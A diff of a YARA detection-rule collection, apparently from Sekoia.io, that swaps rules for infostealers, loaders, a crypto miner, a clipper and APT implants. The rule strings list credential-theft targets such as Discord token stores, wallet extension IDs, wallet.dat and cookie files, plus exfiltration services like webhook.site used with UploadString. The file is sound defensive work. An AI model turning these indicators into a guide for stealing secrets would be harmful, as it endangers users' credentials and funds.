+		$str05 = "\\SearchWallet\\" ascii
+		$str06 = "1234niwef" ascii
+		$str07 = "afbcbjpbpfadlkmhmclhkeeodmamcflc" ascii
+		$str08 = "lodccjjbdhfakaekdiahmedfbieldgik" ascii
+		$str09 = "wallets" ascii
+		$str10 = "config" ascii
+		$str11 = "\"recently_open\": [" ascii
+		$str12 = "\"gui_last_wallet\": " ascii
+		$str13 = "YUOhtyugjKgdfgjFGghj676jj" ascii
 
 	condition:
-		( uint16be( 0 ) == 0x4d5a ) and filesize > 30KB and filesize < 100KB and 1 of them
+		uint16( 0 ) == 0x5A4D and 10 of ( $str* )
 }
-rule SEKOIA_Infostealer_Win_Phoenixwave : FILE
+
+rule SEKOIA_Implant_Win_Graphiron_Downloader : FILE
 {
 	meta:
-		description = "Detect the PhoenixWave infostealer based on specific strings"
+		description = "Detect the downloader of Graphiron"
 		author = "Sekoia.io"
-		id = "67c05ea8-2f1b-4c60-b108-e05d7d0c6508"
-		date = "2022-04-07"
+		id = "c50c4bd2-3828-43bf-b45c-8e911c298536"
+		date = "2023-02-10"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_phoenixwave.yar#L1-L35"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "efeffb2f0df4c2f8156c401bac5f44c415c4c3e02e84e8db55dad68488f39fea"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/implant_win_graphiron_downloader.yar#L4-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f0aa0541cbf3f93ee136cf3235a4935f1c0588b5cdb21203abee9f61baf3f4f2"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-
-	strings:
-		$str0 = "##################################################\n                  Information\n##################################################\n" wide
-		$str1 = "Specify a single character: either D or F" wide
-		$str2 = "// This SFX source file was generated by DotNetZip " wide
-		$str3 = "aHR0cDovL2lwLWFwaS5jb20vanNvbg==" wide
-		$str4 = "TG9jYWxBcHBEYXRh" wide
-		$str5 = "UGhvZW5peFdhdmU=" wide
-		$str6 = "virustotal" wide
-		$str7 = "SELECT * FROM win32_operatingsystem" wide
-		$str8 = "SELECT * FROM Win32_VideoController" wide
-		$app0 = "\\discordcanary\\Local Storage\\leveldb" wide
-		$app1 = "\\discordptb\\Local Storage\\leveldb" wide
-		$app2 = "\\discorddevelopment\\Local Storage\\leveldb" wide
-		$app3 = "\\D877F783D5D3EF8C\\" wide
-		$app4 = "\\IndexedDB\\file__0.indexeddb.leveldb" wide
-		$app5 = "\\Steam\\Games.txt" wide
-		$app6 = "nkbihfbeogaeaoehlefnkodbefgpgknn" wide
-		$app7 = "fhbohimaelbohpjbbldcngcnapndodjp" wide
-		$app8 = "fnjhmkhhmkbjkkabndcnnogagogbneec" wide
-		$app9 = "\\Opera Software\\Opera GX Stable" wide
+		hash1 = "0d0a675516f1ff9247f74df31e90f06b0fea160953e5e3bada5d1c8304cfbe63"
+		hash2 = "878450da2e44f5c89ce1af91479b9a9491fe45211fee312354dfe69e967622db"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 7 of ( $str* ) and 8 of ( $app* )
+		for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "1b614f8d813125f56d2e772ed0ca5dae" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5c6496d33de5a35bd38ddb12d8b42e03" ) and filesize > 3MB and filesize < 6MB
 }
-rule SEKOIA_Infostealer_Win_Redline_Strings : FILE
+rule SEKOIA_Loader_Win_Fudloader : FILE
 {
 	meta:
-		description = "Finds Redline samples based on characteristic strings"
+		description = "Finds FUD-Loader samples based on specific strings"
 		author = "Sekoia.io"
-		id = "0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e"
-		date = "2022-09-07"
+		id = "4c2ac614-89af-4449-9fd2-9f935e4c27b8"
+		date = "2023-09-25"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_redline_strings.yar#L1-L47"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "44443e16b788231b3f256b4d1e91c458c33963d5737d69fc5850f6b0efa7726b"
+		reference = "https://github.com/0day2/FUD-Loader/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_fudloader.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "bf19169963cfcbcf41a2dc5f9447738e957878972590b2a8d310eed1c54f3676"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$gen01 = "ChromeGetRoamingName" ascii
-		$gen02 = "ChromeGetLocalName" ascii
-		$gen03 = "get_UserDomainName" ascii
-		$gen04 = "get_encrypted_key" ascii
-		$gen05 = "browserPaths" ascii
-		$gen06 = "GetBrowsers" ascii
-		$gen07 = "get_InstalledInputLanguages" ascii
-		$gen08 = "BCRYPT_INIT_AUTH_MODE_INFO_VERSION" ascii
-		$spe0 = "Profile_encrypted_value" wide
-		$spe1 = "[AString-ZaString-z\\d]{2String4}\\.[String\\w-]{String6}\\.[\\wString-]{2String7}" wide
-		$spe2 = "AFileSystemntivFileSystemirusPrFileSystemoduFileSystemct|AntiFileSystemSpyWFileSystemareProFileSystemduct|FireFileSystemwallProdFileSystemuct" wide
-		$spe3 = "OpHandlerenVPHandlerN ConHandlernect%DSK_23%Opera GXcookies" wide
-		$spe4 = "//settinString.Removeg[@name=\\PasswString.Removeord\\]/valuString.RemoveeROOT\\SecurityCenter" wide
-		$spe5 = "ROOT\\SecurityCenter2Web DataSteamPath" wide
-		$spe6 = "windows-1251, CommandLine:" wide
-		$spe7 = "OFileInfopeFileInfora GFileInfoX StabFileInfole" wide
-		$spe8 = "ApGenericpDaGenericta\\RGenericoamiGenericng\\" wide
-		$spe9 = "*wallet*" wide
-		$typ01 = "359A00EF6C789FD4C18644F56C5D3F97453FFF20" ascii
-		$typ02 = "F413CEA9BAA458730567FE47F57CC3C94DDF63C0" ascii
-		$typ03 = "A937C899247696B6565665BE3BD09607F49A2042" ascii
-		$typ04 = "D67333042BFFC20116BF01BC556566EC76C6F7E2" ascii
-		$typ05 = "4E3D7F188A5F5102BEC5B820632BBAEC26839E63" ascii
-		$typ06 = "FB10FF1AD09FE8F5CA3A85B06BC96596AF83B350" ascii
-		$typ07 = "77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60" ascii
-		$typ08 = "A8F9B62160DF085B926D5ED70E2B0F6C95A25280" ascii
-		$typ09 = "718D1294A5C2D3F3D70E09F2F473155C4F567201" ascii
-		$typ10 = "2FBDC611D3D91C142C969071EA8A7D3D10FF6301" ascii
-		$typ11 = "2A19BFD7333718195216588A698752C517111B02" ascii
-		$typ12 = "EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2" ascii
-		$typ13 = "04EC68A0FC7D9B6A255684F330C28A4DCAB91F13" ascii
+		$str01 = "set_WindowStyle" ascii
+		$str02 = "set_FileName" ascii
+		$str03 = "get_StartInfo" ascii
+		$str04 = "GetRandomFileName" ascii
+		$str05 = "DownloadFile" ascii
+		$str06 = "GetTempPath" ascii
+		$str07 = "ProcessStartInfo" ascii
+		$str08 = "System.Diagnostics" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 7 of ( $gen* ) or 3 of ( $spe* ) or 2 of ( $typ* ) )
+		uint16( 0 ) == 0x5a4d and all of them and filesize < 10KB
 }
-rule SEKOIA_Apt_Unk_Dex_China_Freedom_Trap_Spyware : FILE
+rule SEKOIA_Miner_Win_Xmrig_Strings : FILE
 {
 	meta:
-		description = "Detects China Freedom Trap spyware dex file"
+		description = "Detects XMRig EXE"
 		author = "Sekoia.io"
-		id = "3d66b6b8-8397-441a-a337-4a282df39591"
-		date = "2022-09-07"
+		id = "35f203aa-20cd-4235-9ead-b34be14255d5"
+		date = "2024-01-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_unk_dex_china_freedom_trap_spyware.yar#L1-L31"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "ceb70fce74898ea64ded6880a978441c"
-		logic_hash = "f85f78a1a58fa8b2698637f8c540877ea1c5141ff7f74e8c2f2755f5aba5a599"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/miner_win_xmrig_strings.yar#L1-L35"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "34aa0da9d3bb277927c87a3745ec9e35881682319c91141da6ff1cff7e0610d9"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240573,95 +241336,92 @@ rule SEKOIA_Apt_Unk_Dex_China_Freedom_Trap_Spyware : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "INSTALL" base64
-		$ = "FAILED" base64
-		$ = "TEST" base64
-		$ = "ONLY" base64
-		$ = "INSTALL" base64
-		$ = "INCONSISTENT" base64
-		$ = "CERTIFICATES" base64
-		$ = "Network country iso:" base64
-		$ = "Network operator name:" base64
-		$ = "SIM operator name:" base64
-		$ = "SIM country iso:" base64
-		$ = "SIM state:" base64
-		$ = "PIN REQUIRED" base64
-		$ = "PUK REQUIRED" base64
+		$ = "XMRig "
+		$ = "pool_wallet"
+		$ = "IP Address currently banned"
+		$ = "rigid"
+		$ = "diff_current"
+		$ = "shares_good"
+		$ = "shares_total"
+		$ = "avg_time"
+		$ = "avg_time_ms"
+		$ = "hashes_total"
+		$ = "pool address"
+		$ = "ping time"
+		$ = "connection time"
+		$ = "daemon+wss://"
+		$ = "daemon+https://"
+		$ = "daemon+http://"
+		$ = "socks5://"
+		$ = "stratum+ssl://"
+		$ = "stratum+tcp://"
 
 	condition:
-		uint32be( 0 ) == 0x6465780A and filesize < 100KB and 4 of them
+		uint32be( 0 ) == 0x5A4D and filesize < 15MB and 7 of them
 }
-rule SEKOIA_Implant_Lin_Lightning : FILE
+rule SEKOIA_Win_Clipper_Generic : FILE
 {
 	meta:
-		description = "Detect the Lightning framework (Core & Downloader plugin)"
+		description = "Clipper found during investigation: 892a9edb03db3fd88fecc1e1a2f56a7339f16f6734e8d77e6538ea2c8c9026d6"
 		author = "Sekoia.io"
-		id = "56f53e89-3b63-4ce7-a3c8-da0ba37246f1"
-		date = "2022-07-21"
+		id = "a94b3d01-dbc7-41e4-8d45-793bf443b1d2"
+		date = "2024-07-03"
 		modified = "2024-12-19"
-		reference = "https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/implant_lin_lightning.yar#L1-L27"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "215eea8275fa69a901f6413b334d2824086098e9a9bb2cffd7cb9df5c869be4c"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/win_clipper_generic.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f2fb2285adb10269aaf3d028d3803775ad86833b36cf24dabb8d404a6380b505"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "{\"ComputerName\":\"%s\",\"Guid\":\"%s\",\"RequestName\":\"%s\",\"Licence\":\"%s\"}"
-		$ = "kill -9 %s"
-		$ = "{%08X-%04X-%04X-%04X-%04X%04X%04X}"
-		$ = "sleep 60 && ./%s &"
-		$ = "cat /sys/class/net/%s/address"
-		$ = "/usr/bin/netstat"
-		$ = "/usr/bin/whoami"
-		$ = "/usr/bin/su"
-		$ = "dup2: %s"
-		$ = "Linux.Plugin.Kernel_%s"
-		$ = "Lightning"
+		$s = { 24 72 61 6e 70 74 68 20 3d 20 69 66 20 28 28 47 65 74 2d 52 61 6e 64 6f 6d 29 20 25 20 32 29 20 7b 20 4a 6f 69 6e 2d 50 61 74 68 20 24 65 6e 76 3a 54 45 4d 50 20 22 24 72 61 6e 2e 70 73 31 22 20 7d 20 65 6c 73 65 20 7b 20 4a 6f 69 6e 2d 50 61 74 68 20 24 65 6e 76 3a 41 50 50 44 41 54 41 20 22 24 72 61 6e 2e 70 73 31 22 20 7d  }
 
 	condition:
-		uint32( 0 ) == 0x464c457f and 9 of them
+		filesize > 1KB and all of them
 }
-
-rule SEKOIA_Implant_Win_Graphiron_Downloader : FILE
+rule SEKOIA_Loader_Win_Erbium : FILE
 {
 	meta:
-		description = "Detect the downloader of Graphiron"
+		description = "Detect the Erbium loader based on specific user-agent and URI"
 		author = "Sekoia.io"
-		id = "c50c4bd2-3828-43bf-b45c-8e911c298536"
-		date = "2023-02-10"
+		id = "d1e5be62-5677-4ef4-9f10-65baf36ab619"
+		date = "2022-09-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/implant_win_graphiron_downloader.yar#L4-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f0aa0541cbf3f93ee136cf3235a4935f1c0588b5cdb21203abee9f61baf3f4f2"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_erbium.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "e93e9dbf0e5412afa4640b4cf5d94374c4df38f8044d44c375e86508c0d4190a"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "0d0a675516f1ff9247f74df31e90f06b0fea160953e5e3bada5d1c8304cfbe63"
-		hash2 = "878450da2e44f5c89ce1af91479b9a9491fe45211fee312354dfe69e967622db"
+
+	strings:
+		$str01 = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36" wide
+		$str02 = "cloud/getHost.php?method=getstub&bid=" wide
+		$str03 = "api.php?method=getstub&bid=" wide
+		$api = "WinHttp" ascii
 
 	condition:
-		for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "1b614f8d813125f56d2e772ed0ca5dae" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5c6496d33de5a35bd38ddb12d8b42e03" ) and filesize > 3MB and filesize < 6MB
+		uint16( 0 ) == 0x5A4D and 2 of ( $str* ) and #api > 6
 }
-
-rule SEKOIA_Wiper_Win_Dnwipe : FILE
+rule SEKOIA_Apt_Shadowpad_First_Called_Function : FILE
 {
 	meta:
-		description = "Detect the dnWipe malware"
+		description = "Detects entrypoint of shadowpad"
 		author = "Sekoia.io"
-		id = "522fdaa5-8fe6-4e37-aaf8-13e3a7787d21"
-		date = "2022-11-21"
+		id = "3ce1ffd3-5c30-4b36-b7cc-c9fa873ebc25"
+		date = "2023-01-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/wiper_win_dnwipe.yar#L4-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "634ca80a168c9d98ce87a3a1a451769bddb7ae27e28b3682693b34ccce2c7ad4"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_shadowpad_first_called_function.yar#L1-L36"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a40db3fad01f4177973fd50bd489e5c4ff6d3592dfff063c2c31694007c31e0b"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240669,51 +241429,71 @@ rule SEKOIA_Wiper_Win_Dnwipe : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "dnWIPE"
-		$ = "dnWIPE" wide
-		$ = "C:\\Users\\Admin1\\source\\repos\\dnWIPE\\dnWIPE\\obj\\Debug\\dnWIPE.pdb"
+		$chunk_1 = {
+        48 83 EC 28
+        33 C9
+        FF 15 ?? ?? ?? ??
+        8B 80 ?? ?? ?? ??
+        3B 05 ?? ?? ?? ??
+        74 ??
+        E8 ?? ?? ?? ??
+        E8 ?? ?? ?? ??
+        EB ??
+        48 8B 0D ?? ?? ?? ??
+        E8 ?? ?? ?? ??
+        8B C8
+        FF 15 ?? ?? ?? ??
+        90
+        B9 28 04 00 00
+        FF 15 ?? ?? ?? ??
+        90
+        48 83 C4 28
+        C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and filesize < 50KB or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "93290ef6447b0a16b92e50a1652ac3eb8f1237cc5f8005e080750fb58c19d230" )
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Zip_Win_Abcloader
+rule SEKOIA_Tool_Rathole_Strings : FILE
 {
 	meta:
-		description = "Use the CRC32 to detect a zip containing the doc file used to drop and launch ABCloader"
+		description = "Detects RATHole based on strings"
 		author = "Sekoia.io"
-		id = "0d14b34a-9095-48fa-b616-4e8239f3b547"
-		date = "2024-08-19"
+		id = "39d11285-a3bf-46c3-901d-ab46601a9066"
+		date = "2024-05-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/zip_win_abcloader.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "0c7d8e611781b29e15df415640858294"
-		logic_hash = "024d068a86432f35b0f7af0c4cdccb37d0979d01e90f7c9d1ae8a2dddfa3bfc8"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_rathole_strings.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f7c42328a38b2c101ea2d179b6adf9cf3d842d9e1c91e85fc6e684ee4f82458f"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$crc = {32 56 27 e2}
-		$name = "iden.doc"
+		$ = "rathole\\src\\" ascii
+		$ = "\\\\?\\\\\\?\\UNC\\" wide
+		$ = "rathole::" ascii
+		$ = "src/server.rs"
+		$ = "`[server]` or `[client]"
 
 	condition:
-		$name at @crc [ 1 ] + 16
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xfeedface or uint32be( 0 ) == 0xfeedfacf or uint32be( 0 ) == 0xcafebabe or uint32be( 0 ) == 0xCFFAEDFE ) and 3 of them
 }
-rule SEKOIA_Generic_Bat_Script_Mock_Http_Services : FILE
+rule SEKOIA_Tool_Win_Forkplayground : FILE
 {
 	meta:
-		description = "Generic rule detecting BAT script using mock HTTP services (used by APT28)"
+		description = "Detect the ForkPlayground malware"
 		author = "Sekoia.io"
-		id = "1cfbe5ba-6304-476d-8308-928100a85c16"
-		date = "2023-09-07"
+		id = "ec9af403-7647-447d-af17-c6931363a166"
+		date = "2023-02-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/generic_bat_script_mock_http_services.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "d34be59cfb054895381580e7852bba6b899cfb680882b7fd24a72438131c3bee"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_win_forkplayground.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "23d93b7eef978f76c9aa6c0bc28a661d160b0a871fd320442b6c27bc92bc279e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240721,30 +241501,28 @@ rule SEKOIA_Generic_Bat_Script_Mock_Http_Services : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$bat1 = "@echo off"
-		$bat2 = "chcp 65001"
-		$ps1 = "WebClient"
-		$ps2 = "UploadString"
-		$dom1 = "mockbin.org"
-		$dom2 = "webhook.site"
-		$dom3 = "mocky.io"
-		$dom4 = "pipedream.com"
+		$ = "Failed to open dump file %s with the last error %i."
+		$ = "Successfully dumped process %i to %s"
+		$ = "ForkPlayground"
+		$ = "Second attempt at taking a snapshot of the target failed. It is likely that there is a difference in process privilege or the handle was stripped."
+		$ = "Failed to take a snapshot of the target process. Attempting to escalate debug privilege..."
+		$ = "Failed to escalate debug privileges, are you running ForkDump as Administrator"
 
 	condition:
-		(1 of ( $bat* ) or 1 of ( $ps* ) ) and 1 of ( $dom* ) and filesize < 2000
+		uint16( 0 ) == 0x5A4D and 1 of them
 }
-rule SEKOIA_Implant_Mul_Alchimist : FILE
+rule SEKOIA_Infostealer_Win_Raccoon_Str_Takemypainback : FILE
 {
 	meta:
-		description = "Detect the Alchimist implant based on strings"
+		description = "Detect Raccoon based on specific strings"
 		author = "Sekoia.io"
-		id = "66330cc6-a7da-4717-9977-0cede48f46f5"
-		date = "2022-10-18"
+		id = "2148636e-47c7-4bf2-8d1e-df68faf65111"
+		date = "2022-10-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/implant_mul_alchimist.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "d4a5338c502b145a1d7ad9f35779e24d66ee2d11bf760d498aab39e2c62fbeb4"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_raccoon_str_takemypainback.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "50d30828dab7e197619eeac4ebd2ab6692a9ac40a5091e23642cd1bdde8e9910"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240752,78 +241530,86 @@ rule SEKOIA_Implant_Mul_Alchimist : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "POST /users/loginpage.html HTTP/1.1" ascii
-		$str02 = "pm3/apps/Insekt/main.go" ascii
-		$str03 = "generate new insekt err" ascii
-		$str04 = "[SHELLCODE][filesize]:[scan]" ascii
-		$str05 = "\\Device\\NamedPipe\\cygwinbad" ascii
-		$str06 = "pm3/utils.GetTmpDir" ascii
-		$str07 = "os/exec.Command" ascii
+		$str0 = "\\ffcookies.txt" wide
+		$str1 = "TakeMyPainBack" wide
+		$str2 = "wallet.dat" wide
+		$str3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" wide
+		$str4 = "Network\\Cookies" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint32( 0 ) == 0x464C457F ) and 5 of them
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
 
-rule SEKOIA_Downloader_Win_Apt33_Tickler : FILE
+rule SEKOIA_Backdoor_Win_Andardoor : FILE
 {
 	meta:
-		description = "Detect the downloader used by APT33 to diwnload Tickler"
+		description = "Detect the Andardoor backdoor used by Andariel"
 		author = "Sekoia.io"
-		id = "e1f704d6-d527-479a-8311-d286c06768ac"
-		date = "2024-08-29"
+		id = "27f28f6e-b8fd-41dc-88a8-92f5a125a807"
+		date = "2023-09-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_win_apt33_tickler.yar#L4-L29"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "e6fff291b73812e5a999fbc566e8f7181dcdf01b849a9664ba05fe0a2bc982fe"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_win_andardoor.yar#L4-L34"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "631836634222f4e081d3070c92150a4e14f06bcdd462fbfdf0756aa1f2661b59"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$ = " : Deleted Dir" wide
+		$ = " : Not Exists" wide
+		$ = " : Deleted File" wide
+		$ = " : Closed." wide
+		$ = " : Opened." wide
+		$ = "GoodLuck!" wide
+
 	condition:
-		uint16be( 0 ) == 0x4d5a and pe.imphash ( ) == "e43c58659b5b3082387307603478881a" or hash.md5 ( pe.rich_signature.clear_data ) == "d30bd7875b225709ecf95bf68dbd435f" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "d7d2079d0a656c06a03f2c277bb08bda" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "61a1425e6a0d28e29c6fd3d451ac3717" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "916bf96ed3274ce8322d9f370432844f" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "3fab9d4ae989d53cecb2f443b8ce88d0" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "e0967483e074da72ceff4dea3bc17530" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "b4a571736b6646765155ffbd57c27c83" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "35c88ba521887f8fe1b2501f8cd8bd98" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "636dc666c7496cb3382b029fed53473f181cdc24405886c468e51a103d78b4d4" )
+		uint16( 0 ) == 0x5A4D and all of them or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "9fea4972270c492ca304f3663913ae63" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "34fde27c3c864efa6225e72016992d341f29cbbea638432a1c63ce05ca568300" )
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_3 : FILE
+rule SEKOIA_Apt_Gamaredon_Ddrdoh_Vbs_Downloader_Vbs : FILE
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Detects malicious VBScript executed by LNK/mshta"
 		author = "Sekoia.io"
-		id = "57b3ca9a-59c5-4b28-8eb9-36ff5b3633c2"
-		date = "2023-02-03"
+		id = "cc29d5d9-58bd-4f68-8673-daa41abfc7be"
+		date = "2023-01-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
